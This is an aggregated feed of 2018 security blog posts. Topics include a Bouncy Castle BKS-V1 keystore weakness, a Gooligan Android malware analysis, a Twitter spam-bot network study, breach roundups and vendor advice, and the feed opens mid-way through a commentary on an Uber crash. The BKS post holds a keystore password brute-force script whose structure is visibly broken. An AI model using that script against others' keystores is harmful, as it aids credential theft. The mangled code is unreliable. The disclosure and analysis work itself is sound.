Second, take special note of framing this new crash as a case where someone was “walking outside of the crosswalk”. That historically has been how the automobile industry exonerated drivers who murder pedestrians. A crosswalk construct was developed specifically to shift blame away from drivers going too fast, criminalizing pedestrians by reducing driver accountability to react appropriately to vulnerable people in a roadway.

Vox has an excellent write-up on how “walking outside of the crosswalk” really is “forgotten history of how automakers invented”…a crime:

…the result of an aggressive, forgotten 1920s campaign led by auto groups and manufacturers that redefined who owned the city streets.

“In the early days of the automobile, it was drivers’ job to avoid you, not your job to avoid them,” says Peter Norton, a historian at the University of Virginia and author of Fighting Traffic: The Dawn of the Motor Age in the American City. “But under the new model, streets became a place for cars — and as a pedestrian, it’s your fault if you get hit.”

Even more to the point, it was the Wheelmen cyclists of the late 1800s who campaigned for Americas paved roads. Shortly after the roads were started, however, aggressive car manufacturers manipulated security issues to eliminate non-driver presence on those roads.

We’re repeating history at this point, and anyone who cites crosswalk theory in defense of an Uber robot murdering a pedestrian isn’t doing transit safety or security experts any favors. Will be interesting to see how the accountability for murder plays out, as it will surely inform algorithms intending to use cars as a weapon.

The Curious Case of the Bouncy Castle BKS Passwords

While investigating BKS files, the path I went down led me to an interesting discovery: BKS-V1 files will accept any number of passwords to reveal information about potentially sensitive contents!

In preparation for my BSidesSF talk, I've been looking at a lot of key files. One file type that caught my interest is the Bouncy Castle BKS (version 1) file format. Like password-protected PKCS12 and JKS keystore files, BKS keystore files protect their contents from those who do not know the password. That is, a BKS file may contain only public information, such as a certificate. Or it may contain one or more private keys. But you won't know until after you use the password to unlock it.

Update March 21, 2018:
We have updated this blog post based on feedback from Thomas Pornin, and confirmation from the Bouncy Castle author. Like JKS files, BKS files do not protect the metadata of their contents by default. The keystore-level password and associated key is only used for integrity checking. By default, private keys are encrypted with the same password as the keystore. These private keys are not affected by the keystore-level weakness outlined in this blog post. That is, even if an unexpected password is accepted by a keystore itself, that same password will not be accepted to decrypt the private key contained within a keystore. Original wording in this blog post that is now understood to be inaccurate has been marked in strikeout notation for transparency.

Cracking BKS Files

As I investigated the first BKS file in my list, I quickly realized assumed that I could not determine what was contained in it unless I had the password. Naively searching the web for things like "bks cracker" and stopping there, I concluded that I'd need to roll my own BKS bruteforce cracker.

Update March 21, 2018:
Tools used to inspect BKS files will refuse to list the contents of the keystore if a valid password is not provided. However, this is actually not because the metadata of the keystore contents are protected. Because the metadata of the keystore contents are not encrypted, this information can be viewed without needing to use a valid password.

Using the pyjks library, I wrote a trivial script:

#!/usr/bin/env python3

import os
import sys
import jks

def trypw(bksfile, pw):
keystore = jks.bks.BksKeyStore.load(bksfile, pw)
if keystore:
print('Password for %s found: "%s"' % (bksfile, pw))
except jks.util.KeystoreSignatureException:
except UnicodeDecodeError:

with open(sys.argv[1]) as h:
pwlist = h.readlines()

for pw in pwlist:
trypw(sys.argv[2], pw.rstrip())

Let's try this on the test BKS file that I have:

$ python strings.txt test.bks
Password for test.bks found: "Redefinir senha"

Cool. "Redefinir senha" seems like an unexpected password to me, but it's not terrible in strength. It has 15 characters, and uses mixed-case and a non-alphanumeric character (a space). Depending on the password-cracking technique used, it could hold up pretty well to bruteforce attacks.

The above proof-of-concept script is quite slow, since it will serially attempt passwords, one at a time. Taking advantage of multi-core systems in Python isn't as easy as it should be, due to the Python GIL. As a simple test, I tried using the ProcessPoolExecutor to see if I could increase my password-attempt throughput. ProcessPoolExecutor side-steps the GIL by spreading the work across multiple Python processes. Each Python process has its own GIL, but because multiple Python processes are being used, this approach should help better utilize my multiprocessor system.

Let's try this version of the brute-force cracking tool:

$ python strings.txt test.bks
Password for test.bks found: "Redefinir senha"
Password for test.bks found: "Activity started without extras"
Password for test.bks found: ""

Wait, what is going on here? How can a single BKS file accept multiple passwords? As it turns out, there are two things going on:

First, when I optimized my BKS bruteforce script with the use of ProcessPoolExecutor, I didn't factor in how the script would behave when it is distributed across multiple processes. In the single-threaded instance above, the script exits as soon as it finds the password. However, when it's distributed across multiple processes using ProcessPoolExecutor, things are different. I didn't have any code to explicitly terminate the parent Python process or any of the forked Python processes. The impact of this is that my multi-process BKS cracking script will continue to make attempts after it finds the password.

The other thing that is happening is related to the BKS file format, which I discuss below.

Hashes and Collisions

When a resource is password-protected with a single password, it is extremely unlikely that another password can also be used to unlock the resource. Consider the simple case where a collision-resistant hash function is used to verify the password: Is this password unique?

Applying a cryptographic hash function to the password results in the following hashes:
MD5 (128-bit): 18fcfa801383d10dd0a1fea051674469
SHA-1 (160-bit): c9e2ef80e5f2afb8aef0d058182cc7f59e93e025
SHA-256 (256-bit): 08a6c455079687616e997c7bfd626ae754ba1a71b229db1b3a515cfa45e9d4ea

The MD5 hash algorithm, which has a digest size of 128 bits, was shown in 1996 to be unsafe if a collision-resistant hash is required. By 2005, researchers produced a pair of PostScript documents and a pair of X.509 certificates where each pair shared the same MD5 hash. While it takes a bit of CPU processing power to find such collisions, it's feasible to do so with modern computing hardware.

The SHA-1 hash algorithm, which has a digest size of 160 bits, is more resistant to collisions than MD5. However by February 2017, the first known SHA-1 collision was produced. This attack required "the equivalent processing power as 6,500 years of single-CPU computations and 110 years of single-GPU computations."

The SHA-256 hash algorithm, which has a digest size of 256 bits, is even more resistant to collisions than SHA-1. To date, no collisions have been found using the SHA-256 hashing algorithm.

BKS-V1 Files and Accidental Collisions

My naive BKS bruteforcing script produced three different passwords for the same BKS file. Let's look at the code for handling BKS files in pyjks:

hmac_fn = hashlib.sha1
hmac_digest_size = hmac_fn().digest_size
hmac_key_size = hmac_digest_size*8 if version != 1 else hmac_digest_size
hmac_key = rfc7292.derive_key(hmac_fn, rfc7292.PURPOSE_MAC_MATERIAL, store_password, salt, iteration_count, hmac_key_size//8)

Here we can see that the HMAC function is SHA-1, which isn't bad. However, it turns out that it's the HMAC key (and its size) that is important, since that's what determines whether the correct password has been provided to unlock the BKS keystore file. If the file is a BKS version 1 file, the hmac_key_size value will be the same as hmac_digest_size.

In the case of hashlib.sha1, the digest_size is 20 bytes (160 bits). But where it gets interesting is the derivation of hmac_key. The size of hmac_key is determined by hmac_key_size//8 (integer division, dropping any remainder). In this case, it's 20//8, which is 2 bytes (16 bits). Why is there integer division by 8 at all? It's not clear, but perhaps the developer confused where bits are used and bytes are used in the code.

Let's add a debugging print() statement to the component of pyjks and test our three different passwords for the same BKS keystore:

$ python -c "import jks; keystore = jks.bks.BksKeyStore.load('test.bks', 'Redefinir senha')"                                                                                                                       hmac_key: c019
$ python -c "import jks; keystore = jks.bks.BksKeyStore.load('test.bks', 'Activity started without extras')" hmac_key: c019
$ python -c "import jks; keystore = jks.bks.BksKeyStore.load('test.bks', '')" hmac_key: c019

Here we can see that the hmac_key value is c019 (hex) with each of the three different passwords that are provided. In each of the three cases, the BKS-V1 keystore is decrypted, despite the likelihood that not one of the three accepted passwords was the one chosen by the software developer.

Why was I accidentally able to find BKS-V1 password collisions due to my shoddy Python programming skills? The maximum entropy you get from any BKS-V1 password is only 16 bits. This is nowhere near enough bits to represent a password. When it comes to password strength, entropy can be used as a measure. If only bruteforce techniques are used, each case-sensitive Latin alphabet character adds 5.7 bits of entropy. So a randomly-chosen three-character,case-sensitive Latin alphabet password will have 17.1 bits of entropy, which already exceeds the complexity of what you can represent in 16 bits. In other words, while a developer can choose a reasonably-strong password to protect the contents integrity of a BKS-V1 file, the file format itself only supports complexity equivalent to just less than what is provided by a randomly-selected case-sensitive three-letter password.

Cracking BKS-V1 Files

What amount of integrity protection does a 16-bit hmac_key provide? Virtually nothing. 16 bits can only represent 65,536 different values. What this means is regardless of the password complexity the developer has chosen, a bruteforce password cracker needs to try at most 65,536 times. A high-end GPU these days can crunch through over 10 billion SHA-1 operations per second.

As it turns out John the Ripper does have BKS file support, despite what my earlier web searches turned up. While there isn't currently GPU support for cracking BKS files, a CPU is plenty fast enough. My limited testing has shown that any BKS-V1 file can be cracked in about 10 seconds or less using just a single CPU core on a modern system.

Conclusion and Recommendations

Without a doubt, BKS-V1 keystore files are insecure, due to insufficient HMAC key size. Although BKS files support password protection to protect their contents integrity, the protection supplied by version 1 of the file format is nearly zero. For these reasons, here are recommendations for developers who use Bouncy Castle:

  • Be sure to use Bouncy Castle version 1.47 or newer. This version, which was introduced on March 30, 2012, increases the default MAC of a BKS key store from 2 bytes to 20 bytes.

    This information has been in the release notes for Bouncy Castle for about six years, but it may have been overlooked because no CVE identifier was assigned to this weakness. Approximately 84% of the BKS files seen in Android applications are using the vulnerable version 1. We assigned CVE-2018-5382 to this issue to help ensure that it gets the attention it deserves.
  • On modern Bouncy Castle versions, do not use the "BKS-V1" format, which was added for legacy compatibility with Bouncy Castle version 1.46 and earlier.
  • If you have rely on password protection provided by BKS-V1 to protect private key material, these private keys should be considered compromised. Such keys should be regenerated and stored in a keystore that provides adequate protection against brute-force attacks, along with a sufficiently complex and long password. For BKS files that contain only public information, such as certificates, the weak password protection provided by version 1 of the format is not important.

For more details, please see CERT Vulnerability Note VU#306792.

The NIS Directive – just how tough is it really?

Over the last few months, UK media outlets have been filled with reports about the series of tough new measures being introduced on 9th May to protect our national critical infrastructure against cyber threats. In January, the government confirmed that UK critical infrastructure organisations may soon be liable for fines of up to £17m if they fail to implement robust cyber security measures, under its plans to implement the EU’s Network and Information Systems (NIS) Directive. But despite the tough talk, are the current proposals as rigorous as they sound?

In January, the government published its plans to implement the NIS Directive into UK law, following a public consultation. But despite the punitive penalty system, the response avoided making any hard recommendations and instead relies on a high level “appropriate and proportionate technical and organisational measures” regulatory approach of deferring responsibility to the National Cyber Security Centre (NCSC) and the Competent Authorities. Looking to the NCSC guidance, the series of measures it outlines are heavily weighted on reactive attack reporting rather than advising organisations on how to better shore up their perimeter with proactive defence solutions. As an example, within the guidance organisations are asked to define their own risk profile, and then prove their resiliency against that profile – the equivalent of being graded on a test you wrote yourself.

In this light, it’s unclear how the opportunity to set out a framework of minimum standards for CNI can be effectively achieved with the NIS Regulations. If the intended outcome is genuinely tied to resilience against cyber-attacks, then these essential services should be required to remain available during all but the most extreme cyber-attacks. The outcome described in the guidance points to merely the proper disclosure of failed protection and the swift recovery from that failure. My concern remains that implementation of the NIS Directive will be viewed as a mere “tick box” exercise which requires the bare minimum to be done, rather than allowing the UK to set world-leading standards in this area.

As a UK citizen, I fear that our government is failing to deliver on the promises outlined in its Digital Strategy, which pledged to make the UK “the safest place in the world to live and work online.” This is all deeply concerning, especially given that Ciaran Martin, the head of the NCSC, warned in January that it was a matter of “when, not if” the UK faces a major cyber-attack that might cripple infrastructure such as energy supplies or the financial services sector. Across all parts of critical national infrastructure, we are seeing a greater number of sophisticated and damaging cyber threats which are often believed to be the work of foreign governments seeking to cause political upheaval. Last year’s DDoS attacks against the transport network in Sweden caused train delays and disrupted travel services, while the WannaCry ransomware attacks last May demonstrated the capacity for cyber-attacks to impact people’s access to essential services. Only this month, we have seen a surge in record-breaking DDoS attacks that exploit the Memcached vulnerability.

As the draft NIS Regulations become UK law, we have a golden opportunity to improve the UK’s cyber security posture. Let’s hope we can still seize this moment and build an eco-system that genuinely protects our critical infrastructure against today’s cyber-attacks.

These Best Practices Will Stop 90% Of The Cyber Threat

The leadership of our consultancy Crucial Point have been working to enhance the security posture and mitigate cyber risks for over a decade, successfully operating across multiple sectors of the economy to help leaders thwart dynamic adversaries. In doing so we have found most businesses can take steps to raise defenses before calling in the experts.

The nine steps below, taken from the Crucial Point Best Cybersecurity Practices page, can help kickstart the defense of any firm.

These steps are:

  1. Use a “framework” that will guide your action. Our favorite one is the NIST Cybersecurity Framework, but there are many. This framework will help guide your policies, procedures, contracting and incident response.
  2. Work to know the threat. Knowing the cyber threat will help you more rapidly and economically adjust your defenses. We wrote a book to help you do this. Find it at: The Cyber Threat
  3. Think of your nightmare scenarios. Only you know your business and only you can really know what could go wrong if the worse happens. Use these nightmare scenarios to help determine what your most important data is, this is going to help prioritize your defensive actions.
  4. Ensure you and your team are patching operating systems and applications. This sounds so basic, and it is so basic. But it is too frequently overlooked and it gets companies hacked, again and again. So don’t just assume it is going on. Check it.
  5. Put multi-factor authentication in place for every employee. Depending on your business model, you may need to do this for customers and suppliers too. This is very important for a good defense.
  6. Block malicious code. This is easier said than done, but work to put a strategy in place that ensures only approved applications can be installed in your enterprise, and, even though anti-virus solutions are not comprehensive, ensure you have them in place and keep them up to date.
  7. Design to detect and respond to breach. This means put monitoring in place and also use proper segmentation of your systems so an adversary has a harder time moving around.
  8. Encrypt your data. And back it up!
  9. Prepare for the worse. Know what your incident response plan is and make sure it is well documented and reviewed. Ensure it includes notification procedures.

Those are just the first few steps. But please put them in place!  By following community best practices you can make an immediate difference in your own security posture. These are, for the most part, things you can do yourself for very little cost.

To accelerate your implementation of these best practices, or to independently verify and validate your security posture and receive detailed action plans for improvement, contact Crucial Point here and ask about our CISO-as-a-Service offering.

The post These Best Practices Will Stop 90% Of The Cyber Threat appeared first on The Cyber Threat.

10 Tips to Improve Employee Cyber Security Compliance

Proactive Steps to Promote Employee Cyber Security Compliance Your organization’s people are your first line of defense against cyber criminals. Unfortunately, they’re also your weakest link. Insiders pose the biggest threat to cyber security in the healthcare industry, and only 13% of public sector employees “take personal responsibility for cyber security.” Here are 10 proactive… Read More

The post 10 Tips to Improve Employee Cyber Security Compliance appeared first on .

Employees Are Biggest Threat to Healthcare Data Security

Two new reports illustrate the threat of employee carelessness and maliciousness to healthcare data security

Healthcare data security is under attack from the inside. While insider threats – due to employee error, carelessness, or malicious intent – are a problem in every industry, they are a particular pox on healthcare data security. Two recent reports illustrate the gravity of the situation.

Two new reports illustrate the threat of employee carelessness and maliciousness to healthcare data security

Verizon’s 2018 Protected Health Information Data Breach Report, which examined 1,368 healthcare data security incidents in 27 countries (heavily weighted towards the U.S.), found that:

  • 58% of protected health information (PHI) security incidents involved internal actors, making healthcare the only industry where internal actors represent the biggest threat to their organizations.
  • About half of these incidents were due to error or carelessness; the other half were committed with malicious intent.
  • Financial gain was the biggest driver behind intentional misuse of PHI, accounting for 48% of incidents. Unauthorized snooping into the PHI of acquaintances, family members, or celebrities out of curiosity or for “fun” was second (31%).
  • Over 80% of the time, insiders who intentionally misused PHI didn’t “hack” anything; they simply used their existing credentials or physical access to hardware (such as access to a laptop containing PHI).
  • 21% of PHI security incidents involved lost or stolen laptops containing unencrypted data.
  • In addition to PHI breaches, ransomware continues to plague healthcare data security; 70% of incidents involving malicious code were ransomware attacks.

Meanwhile, a separate survey on healthcare data security conducted by Accenture found that nearly one in five healthcare employees would be willing to sell confidential patient data to a third party, and they would do so for as little as $500 to $1,000. Even worse, nearly one-quarter reported knowing “someone in their organization who has sold their credentials or access to an unauthorized outsider.”

Combating Insider Threats to Healthcare Data Security

Healthcare data security is especially tricky because numerous care providers require immediate and unrestricted access to patient information to do their jobs. Any hiccups along the way could result in a dead or maimed patient. However, there are proactive steps healthcare organizations can take to combat insider threats:

  • Establish written acceptable use policies clearly outlining who is allowed to access patient health data and when, and the consequences of accessing PHI without a legitimate reason.
  • Back up these policies with routine monitoring for unusual or unauthorized user behavior; always know who is accessing patient records.
  • Restrict system access as appropriate, and review user access levels on a regular basis.
  • Don’t forget to address the physical security of hardware, such as laptops.

The cyber security experts at Continuum GRC have deep knowledge of the cyber security field, are continually monitoring the latest information security threats, and are committed to protecting your organization from security breaches. Continuum GRC offers full-service and in-house risk assessment and risk management subscriptions, and we help companies all around the world sustain proactive cyber security programs.

Continuum GRC is proactive cyber security®. Call 1-888-896-6207 to discuss your organization’s cyber security needs and find out how we can help your organization protect its systems and ensure compliance.

The post Employees Are Biggest Threat to Healthcare Data Security appeared first on .

Taking down Gooligan: part 2 — inner workings

This post provides an in-depth analysis of the inner workings of Gooligan, the infamous Android OAuth stealing botnet.

This is the second post of a series dedicated to the hunt and takedown of Gooligan that we did at Google, in collaboration with Check Point, in November 2016. The first post recounts Gooligan’s origin story and provides an overview of how it works. The final post discusses Gooligan’s various monetization schemas and its take down. As this post builds on the previous one , I encourage you to read it, if you haven’t done so already.

This series of posts is modeled after the talk I gave at Botconf in December 2017. Here is a re-recording of the talk:

You can also get the slides here but they are pretty bare.


Initially, users are tricked into installing Gooligan’s staging app on their device under one false pretense or another. Once this app is executed, it will fully compromise the device by performing the five steps outlined in the diagram below:

Googligan infection process

As emphasized in the chart above, the first four stages are mostly borrowed from Ghost Push . Gooligan authors main addition is the code needed to instrument the Play Store app using a complex injection process. This heavy code reuse initially made it difficult for us to separate Ghost Push samples from Gooligan ones. However, as soon as we had the full kill chain analyzed, we were able to write accurate detection signatures.

Payload decoding

Most Gooligan samples hide their malicious payload in a fake image located in assets/close.png. This file is encrypted with a hardcoded [XOR encryption] function. This encryption is used to escape the signatures that detect the code that Gooligan borrows from previous malware. Encrypting malicious payload is a very old malware trick that has been used by Android malware since at least 2011.

Gooligan initial payload file structure

Besides its encryption function, one of the most prominent Gooligan quirks is its weird (and poor) integrity verification algorithm. Basically, the integrity of the close.png file is checked by ensuring that the first ten bytes match the last ten. As illustrated in the diagram above, the oddest part of this schema is that the first five bytes (val 1) are compared with the last five, while bytes six through ten (val 2) are compared with the first five.

Phone rooting

Gooligan initial payload file structure

As alluded to earlier, Gooligan, like Snappea and Ghostpush, weaponizes the Kingroot exploit kit to gain root access. Kingroot operates in three stages: First, the malware gathers information about the phone that are sent to the exploit server. Next, the server looks up its database of exploits (which only affect Android 3.x and 4.x) and builds a payload tailored for the device. Finally, upon payload reception, the malware runs the payload to gain root access.

The weaponization of known exploits by cyber-criminals who lack exploit development capacity (or don't want to invest into it) is as old as crimeware itself. For example, DroidDream exploited Exploid and RageAgainstTheCage back in 2011. This pattern is common across every platform. For example, recently NSA-leaked exploit Eternal Blue was weaponized by the fake ransomware NoPetya. If you are interested in ransomware actors, check my posts on the subject.

Persistence setup

Upon rooting the device, Gooligan patches the script to ensure that it will survive a factory reset. This resilience mechanism was the most problematic aspect of Gooligan, from a remediation perspective, because for the oldest devices, it only left us with OTA (over the air) update and device re-flashing as a way to remove it. This situation was due to the fact that very old devices don't have verified boot , as it was introduced in Android 4.4.

Android recovery

This difficult context, combined with the urgent need to help our users, led us to resort to a strategy that we rarely use: a coordinated takedown. The goal of this takedown was to disable key elements of the Gooligan infrastructure in a way that would ensure that the malware would be unable to work or update. As discussed in depth at the end of the post, we were able to isolate and take down Gooligan’s core server in less than a week thanks to a wide cross-industry effort. In particular, Kjell from the NorCert worked around the clock with us during the Thanksgiving holidays (thanks for all the help, Kjell!).

Play store app manipulation

The final step of the infection is the injection of a shared library into the Play store app. This shared library allows Gooligan to manipulate the Play store app to download apps and inject review.

We traced the injection code back to publicly shared code . The library itself is very bare: the authors added only the code needed to call Play store functions. All the fraud logic is in the main app, probably because the authors are more familiar with Java than C.

Impacted devices


Geo distribution of devices impacted by Gooligan

Looking at the set of devices infected during the takedown revealed that most of the affected devices were from India, Latin America, and Asia, as visible in the map above. 19% of the infections were from India, and the top eight countries affected by Gooligan accounted for more than 50% of the infections.


Phone maker distribution for devices impacted by Gooligan

In term of devices, as shown in the barchart above, the infections are spread across all the big brands, with Samsung and Micromax being unsurprisingly the most affected given their market share. Micromax is the leading Indian phone maker, which is not very well known in the U.S. and Europe because it has no presence there. It started manufacturing Android One devices in 2014 and is selling in quite a few countries besides India, most notably Russia.


Initial clue

Gooligan HAproxy configuration

Buried deep inside Gooligan patient zero code, Check Point researchers Andrey Polkovnichenko , Yoav Flint Rosenfeld , and Feixiang He , who worked with us during the escalation, found the very unusual text string oversea_adjust_read_redis. This string led to the discovery of a Chinese blog post discussing load balancer configuration, which in turn led to the full configuration file of Gooligan backend services.

#Ads API
        acl is_ads path_beg /overseaads/
        use_backend overseaads if is_ads

#Payment API
        acl is_paystatis path_beg /overseapay/admin/
        use_backend overseapaystatis if is_paystatis

# Play install
        acl is_appstore path_beg /appstore/
        use_backend overseapaystatis if is_appstore

Analyzing the exposed HAproxy configuration allowed us to pinpoint where the infrastructure was located and how the backend services were structured. As shown in the annotated configuration snippet above, the backend had API for click fraud, receiving payment from clients, and Play store abuse. While not visible above, there was also a complex admin and statistic-related API.


Gooligan infrastructure

Combining the API endpoints and IPs exposed in the HAproxy configuration with our knowledge of Gooligan binary allowed us to reconstruct the infrastructure charted above. Overall, Gooligan was split into two main data centers: one in China and one overseas in the US, which was using Amazon AWS IPs. After the takedown, all the infrastructure ended up moving back to China.

Note: in the above diagram, the Fraud end-point appears twice. This is not a mistake: at Gooligan peak, its authors splited it out to sustain the load and better distribute the requests.


So, who is behind Gooligan? Based on this infrastructure analysis and other data, we strongly believe that it is a group operating from mainland China. Publicly, the group claims to be a marketing company, while under the hood it is mostly focused on running various fraudulent schema. The apparent authenticity of its front explains why some reputable companies ended up being scammed by this group. Bottom line: be careful who you buy ads or install from: If it is too good to be true...

In the final post of the serie, I discusses Gooligan various monetization schemas and its takedown. See you there!

Thank you for reading this post till the end! If you enjoyed it, don’t forget to share it on your favorite social network so that your friends and colleagues can enjoy it too and learn about Gooligan.

To get notified when my next post is online, follow me on Twitter , Facebook , Google+ , or LinkedIn . You can also get the full posts directly in your inbox by subscribing to the mailing list or via RSS .

A bientôt!

Weekly Cyber Risk Roundup: Russia Sanctions, Mossack Fonseca Shutdown, Equifax Insider Trading

On Thursday, the U.S. government imposed sanctions against five entities and 19 individuals for their role in “destabilizing activities” ranging from interfering in the 2016 U.S. presidential election to carrying out destructive cyber-attacks such as NotPetya, an event that the Treasury department said is the most destructive and costly cyber-attack in history.

“These targeted sanctions are a part of a broader effort to address the ongoing nefarious attacks emanating from Russia,” said Treasury Secretary Steven T. Mnuchin in a press release. “Treasury intends to impose additional CAATSA [Countering America’s Adversaries Through Sanctions Act] sanctions, informed by our intelligence community, to hold Russian government officials and oligarchs accountable for their destabilizing activities by severing their access to the U.S. financial system.”

Nine of the 24 entities and individuals named on Thursday had already received previous sanctions from either President Obama or President Trump for unrelated reasons, The New York Times reported.

In addition to the sanctions, the Department of Homeland Security and the FBI issued a joint alert warning that the Russian government is targeting government entities as well as organizations in the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors.

According to the alert, Russian government cyber actors targeted small commercial facilities’ networks with a multi-stage intrusion campaign that staged malware, conducted spear phishing attacks, and gained remote access into energy sector networks. The actors then used their access to conduct network reconnaissance, move laterally, and collect information pertaining to Industrial Control Systems.


Other trending cybercrime events from the week include:

  • Sensitive data exposed: Researchers discovered a publicly accessible Amazon S3 bucket belonging to the Chicago-based jewelry company MBM Company Inc. that exposed the personal information of more than 1.3 million people. About 3,000 South Carolina recipients of the Palmetto Fellows scholarship had their personal information exposed online for over a year due to a glitch when switching programs. The Dutch Data Protection Authority accidentally leaked the names of some of its employees due to not removing metadata from more than 800 public documents.
  • State data breach notifications: ABM Industries is notifying clients of a phishing incident that may have compromised their personal information. Chopra Enterprises is notifying customers that payment cards used on its ecommerce site may have been compromised. Neil D. DiLorenzo CPA is notifying clients of unauthorized access to a system that contained files related to tax returns, and several clients have reported fraudulent activity related to their tax returns. NetCredit is warning a small percentage of customers that an unauthorized party used their credentials to access their accounts.
  • Other data breaches: A misconfiguration at Florida Virtual School led to the personal information of  368,000 students as well as thousands of former and current Leon County Schools employees being compromised. Okaloosa County Water and Sewer said that individuals may have had their payment card information stolen due to a breach involving external vendors that process credit and debit card payments.  The Nampa School District said that an email account compromise may have compromised the personal information of 3,983 current and past employees. A cyber-attack at the Port of Longview may have exposed the personal information of 370 current and former employees as well as 47 vendors.
  • Arrests and legal actions: A Maryland Man was sentenced to 12 years in prison for his role in a multi-million dollar identity theft scheme that claimed fraudulent tax refunds over a seven-year period. The owner of Smokin’ Joe’s BBQ in Missouri has been charged with various counts related to the use of stolen credit cards. Svitzer said that 500 employees are impacted by the discovery of three employee email accounts in finance, payroll, and operations were auto-forwarding emails outside of the company for nearly 11 months without the company’s knowledge.
  • Other notable events: Up to 450 people who filed reports with Gwent Police over a two-year period had their data exposed due to security flaws in the online tool, and those people were never notified that their data may have been compromised. A security flaw on a Luxembourg public radio station may have exposed non-public information.

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.


Cyber Risk Trends From the Past Week

2018-03-17_RiskScoresTwo of the largest data breaches of recent memory were back in the news this week due to Mossack Fonseca announcing that it is shutting down following the fallout from the Panama Papers breach as well as a former Equifax employee being charged with insider trading related to its massive breach.

Documents stolen from the Panamanian law firm Mossack Fonseca and leaked to the media in April 2016 were at the center of the scandal known as the Panama Papers, which largely revealed how rich individuals around the world were able to evade taxes in various countries.

“The reputational deterioration, the media campaign, the financial circus and the unusual actions by certain Panamanian authorities, have occasioned an irreversible damage that necessitates the obligatory ceasing of public operations at the end of the current month,” Mossack Fonseca wrote in a statement.

While Mossack Fonseca’s data breach appears to have finally led to the organization shutting down, Equifax’s massive breach announcement in September 2017 has since sparked a variety of regulatory questions, as well as criticism of the company’s leadership and allegations of insider trading.

Last week the SEC officially filed a complaint that alleges that Jun Ying, who was next in line to be the company’s global CIO, conducted insider trading by using confidential information entrusted to him by the company to conclude Equifax had suffered a serious breach, and Ying then exercised all of his vested Equifax stock options and sold the shares in the days before the breach was publicly disclosed.

“According to the complaint, by selling before public disclosure of the data breach, Ying avoided more than $117,000 in losses,” the SEC wrote in a press release.

Ying also faces criminal charges from the U.S. Attorney’s Office for the Northern District of Georgia.

Good To Be Back – Paul’s Security Weekly #551

This week, Patrick Laverty of Rapid7 joins us for an interview! Dick Wilkins of Phoenix Technologies joins us for our second feature interview! In the news, we have updates from Flash, Pwn2Own, VMware, and more on this episode of Paul's Security Weekly!

Full Show Notes:


Visit for all the latest episodes!

Google’s new Gaming Venture: A New Player?

Google in Gaming – Facts and Speculation In January 2018, game industry veteran Phil Harrison announced that he was joining Google as a Vice President and GM. With Harrison’s long history of involvement with video game companies – having previously worked with Sony and Microsoft’s Xbox division – this immediately prompted speculation and rumours about […]

Marketing “Dirty Tinder” On Twitter

About a week ago, a Tweet I was mentioned in received a dozen or so “likes” over a very short time period (about two minutes). I happened to be on my computer at the time, and quickly took a look at the accounts that generated those likes. They all followed a similar pattern. Here’s an example of one of the accounts’ profiles:

This particular avatar was very commonly used as a profile picture in these accounts.

All of the accounts I checked contained similar phrases in their description fields. Here’s a list of common phrases I identified:

  • Check out
  • Check this
  • How do you like my site
  • How do you like me
  • You love it harshly
  • Do you like fast
  • Do you like it gently
  • Come to my site
  • Come in
  • Come on
  • Come to me
  • I want you
  • You want me
  • Your favorite
  • Waiting you
  • Waiting you at

All of the accounts also contained links to URLs in their description field that pointed to domains such as the following:


It turns out these are all shortened URLs, and the service behind each of them has the exact same landing page:

“I will ban drugs, spam, porn, etc.” Yeah, right.

My colleague, Sean, checked a few of the links and found that they landed on “adult dating” sites. Using a VPN to change the browser’s exit node, he noticed that the landing pages varied slightly by region. In Finland, the links ended up on a site called “Dirty Tinder”.

Checking further, I noticed that some of the accounts either followed, or were being followed by other accounts with similar traits, so I decided to write a script to programmatically “crawl” this network, in order to see how large it is.

The script I wrote was rather simple. It was seeded with the dozen or so accounts that I originally witnessed, and was designed to iterate friends and followers for each user, looking for other accounts displaying similar traits. Whenever a new account was discovered, it was added to the query list, and the process continued. Of course, due to Twitter API rate limit restrictions, the whole crawler loop was throttled so as to not perform more queries than the API allowed for, and hence crawling the network took quite some time.

My script recorded a graph of which accounts were following/followed by which other accounts. After a few hours I checked the output and discovered an interesting pattern:

Graph of follower/following relationships between identified accounts after about a day of running the discovery script.

The discovered accounts seemed to be forming independent “clusters” (through follow/friend relationships). This is not what you’d expect from a normal social interaction graph.

After running for several days the script had queried about 3000 accounts, and discovered a little over 22,000 accounts with similar traits. I stopped it there. Here’s a graph of the resulting network.

Pretty much the same pattern I’d seen after one day of crawling still existed after one week. Just a few of the clusters weren’t “flower” shaped. Here’s a few zooms of the graph.


Since I’d originally noticed several of these accounts liking the same tweet over a short period of time, I decided to check if the accounts in these clusters had anything in common. I started by checking this one:

Oddly enough, there were absolutely no similarities between these accounts. They were all created at very different times and all Tweeted/liked different things at different times. I checked a few other clusters and obtained similar results.

One interesting thing I found was that the accounts were created over a very long time period. Some of the accounts discovered were over eight years old. Here’s a breakdown of the account ages:

As you can see, this group has less new accounts in it than older ones. That big spike in the middle of the chart represents accounts that are about six years old. One reason why there are fewer new accounts in this network is because Twitter’s automation seems to be able to flag behaviors or patterns in fresh accounts and automatically restrict or suspend them. In fact, while my crawler was running, many of the accounts on the graphs above were restricted or suspended.

Here are a few more breakdowns – Tweets published, likes, followers and following.

Here’s a collage of some of the profile pictures found. I modified a python script to generate this – far better than using one of those “free” collage making tools available on the Internets. 🙂

So what are these accounts doing? For the most part, it seems they’re simply trying to advertise the “adult dating” sites linked in the account profiles. They do this by liking, retweeting, and following random Twitter accounts at random times, fishing for clicks. I did find one that had been helping to sell stuff:

Individually the accounts probably don’t break any of Twitter’s terms of service. However, all of these accounts are likely controlled by a single entity. This network of accounts seems quite benign, but in theory, it could be quickly repurposed for other tasks including “Twitter marketing” (paid services to pad an account’s followers or engagement), or to amplify specific messages.

If you’re interested, I’ve saved a list of both screen_name and id_str for each discovered account here. You can also find the scraps of code I used while performing this research in that same github repo.

The Wizard of Value – Enterprise Security Weekly #83

This week, Rami Essaid, Founder of Distil Networks joins us for an interview! In the news, we have updates from CyberArk, Tenable, Fortinet, & Rapid7! Our very own Michael Santarcangelo is joined by Matt Alderman on this episode of Enterprise Security Weekly!


Full Show Notes:


Visit for all the latest episodes!

Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries

Intrusions Focus on the Engineering and Maritime Sector

